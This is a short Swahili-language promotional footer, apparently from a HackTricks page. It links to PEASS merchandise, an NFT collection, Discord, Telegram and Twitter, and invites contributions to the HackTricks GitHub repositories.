* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
2022-04-28 16:01:33 +00:00
</details>